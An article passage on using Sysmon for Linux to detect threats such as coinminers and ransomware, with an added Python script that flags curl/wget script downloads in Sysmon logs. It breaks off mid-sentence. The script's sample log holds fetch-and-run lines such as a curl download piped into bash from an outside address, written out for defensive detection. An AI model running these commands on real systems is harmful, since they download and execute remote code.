Linux-based systems are the host operating system for cloud hosts, application servers, and a wide variety of internet of things (IoT) devices, and like any other operating system they are susceptible to attack. Sysmon for Linux, the Linux port of the well-known Sysinternals Sysmon tool, improves host-based visibility and makes detecting and responding to threats more efficient.
Introduction
A report from VirusTotal released this year shows a 146% increase in the number of samples targeting Linux systems submitted to the platform [1]. Coinminers affect all operating systems, but they make up most of the threats seen against Linux environments. Ransomware gangs are active here as well: BlackMatter, HelloKitty and REvil have all been observed targeting ESXi servers with ELF encryptors [2]. Criminals targeting Linux systems are a fast-growing threat to multi-cloud environments, including data centers, where public and private clouds host key components such as email servers and customer databases and are therefore valuable targets. The exact method of initial access is often hard to determine, but weak user authentication and web application vulnerabilities are the vectors most commonly leveraged. After gaining a foothold, adversaries usually use built-in utilities such as curl or wget to download additional shell scripts from external sources.
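As an added illustration of that last step (example code written for this page, not part of the original article or of Sysmon for Linux itself), the following Python script parses Sysmon for Linux ProcessCreate events in the XML form they are written to syslog and flags curl/wget invocations that fetch a .sh file, write the response to disk, or are piped straight into a shell. The log lines, host name, addresses and the flag heuristics are constructed assumptions. One detail worth noting: a `curl ... | sh` pipe only appears in the shell's own command line, because the curl process sees just its own argv, so the check has to look at the parent shell's event and not only at curl's.

```python
"""Added example: flag scripted curl/wget downloads in Sysmon for Linux
ProcessCreate (EventID 1) events. The events below are constructed, and the
flag patterns are this example's own heuristics, not Sysmon rules."""
import re
import xml.etree.ElementTree as ET

DOWNLOADERS = ("curl", "wget")
SHELLS = ("sh", "bash", "dash", "zsh")

URL = re.compile(r"https?://[^\s\"']+")
# Short-option cluster containing o/O (curl -o/-O, wget -O, "-qO-"), or the
# long forms: the response is written somewhere instead of printed.
WRITES_FILE = re.compile(r"(?:^|\s)(?:-[a-zA-Z]*[oO]|--output(?:-document)?\b|--remote-name\b)")
# "curl ... | sh" only appears in the *shell's* command line; the curl process
# itself sees just its own argv, so the pipe must be checked on the parent.
PIPED_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b")


def parse_event(line):
    """Return the System/EventData fields of one Sysmon for Linux syslog line as a dict, or None."""
    start = line.find("<Event>")
    if start < 0:
        return None
    root = ET.fromstring(line[start:].strip())
    fields = {d.get("Name"): (d.text or "") for d in root.iter("Data")}
    fields["EventID"] = root.findtext("./System/EventID", default="")
    return fields


def classify(evt):
    """Return a reason string if a ProcessCreate event looks like a scripted download, else None."""
    if evt.get("EventID") != "1":
        return None
    name = evt.get("Image", "").rsplit("/", 1)[-1]
    cmd = evt.get("CommandLine", "")
    if name in SHELLS:
        return "download piped to shell" if PIPED_TO_SHELL.search(cmd) else None
    if name not in DOWNLOADERS:
        return None
    url = URL.search(cmd)
    if not url:
        return None
    reasons = []
    if WRITES_FILE.search(cmd):
        reasons.append("saved to disk")
    if url.group(0).endswith(".sh"):
        reasons.append("fetches .sh")
    return ", ".join(reasons) or None


def scan(lines):
    """Run classify() over syslog lines; return one summary dict per flagged event."""
    hits = []
    for line in lines:
        evt = parse_event(line)
        if evt is None:
            continue
        reason = classify(evt)
        if reason:
            hits.append({
                "time": evt.get("UtcTime", ""),
                "user": evt.get("User", ""),
                "parent": evt.get("ParentImage", ""),
                "cmd": evt.get("CommandLine", ""),
                "reason": reason,
            })
    return hits


def _event(eid, **data):
    """Build one constructed syslog line in the shape Sysmon for Linux writes to /var/log/syslog."""
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'Oct 19 12:00:01 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/>'
            f'<EventID>{eid}</EventID><Channel>Linux-Sysmon/Operational</Channel></System>'
            f'<EventData>{body}</EventData></Event>')


SAMPLE_LOG = [  # constructed sample: a web shell fetching and running a script
    _event(1, UtcTime="2021-10-19 12:00:01.001", ProcessId="4121", Image="/bin/bash",
           CommandLine='bash -c "curl -fsSL http://203.0.113.7/x.sh | bash"',
           User="www-data", ParentImage="/usr/sbin/apache2"),
    _event(1, UtcTime="2021-10-19 12:00:01.004", ProcessId="4122", Image="/usr/bin/curl",
           CommandLine="curl -fsSL http://203.0.113.7/x.sh",
           User="www-data", ParentImage="/bin/bash"),
    _event(3, UtcTime="2021-10-19 12:00:01.010", ProcessId="4122", Image="/usr/bin/curl",
           DestinationIp="203.0.113.7", DestinationPort="80"),
    _event(1, UtcTime="2021-10-19 12:00:09.200", ProcessId="4130", Image="/usr/bin/wget",
           CommandLine="wget -q -O /tmp/.x https://203.0.113.7/payload",
           User="www-data", ParentImage="/bin/sh"),
    _event(1, UtcTime="2021-10-19 12:05:00.000", ProcessId="4201", Image="/usr/bin/curl",
           CommandLine="curl -sI https://example.com/",
           User="deploy", ParentImage="/bin/bash"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['time']} {hit['user']} {hit['parent']} -> {hit['cmd']!r}: {hit['reason']}")
```

Run against the constructed sample, three of the five lines are flagged: the shell that pipes the download, the curl child that fetches the .sh file, and the wget that writes to /tmp. The plain `curl -sI` HEAD request by a deploy user and the EventID 3 network event are left alone, which is the point of keying on ProcessCreate fields rather than on the bare presence of curl.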
Locating a malicious program means identifying the clues that indicate its presence on a system; these clues are called Indicators of Compromise (IoCs) [3]. Network-based detection is commonly the first choice for identifying and monitoring malicious activity. Although it is effective, the data acquired at the network level can....